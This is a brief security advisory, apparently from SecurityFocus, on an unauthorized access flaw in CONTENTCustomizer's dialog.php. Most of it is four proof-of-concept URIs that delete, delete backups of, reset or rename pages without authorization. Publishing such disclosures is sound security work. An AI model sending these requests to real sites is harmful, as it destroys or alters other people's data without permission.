CONTENTCustomizer Dialog.PHP Unauthorized Access Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/dialog.php?action=del&doc='+pagename // Delete
http://www.example.com/dialog.php?action=delbackup&doc='+pagename // Delete Backup
http://www.example.com/dialog.php?action=res&doc='+pagename // Reset
http://www.example.com/dialog.php?action=ren&doc='+pagename // Rename


 

Privacy Statement
Copyright 2010, SecurityFocus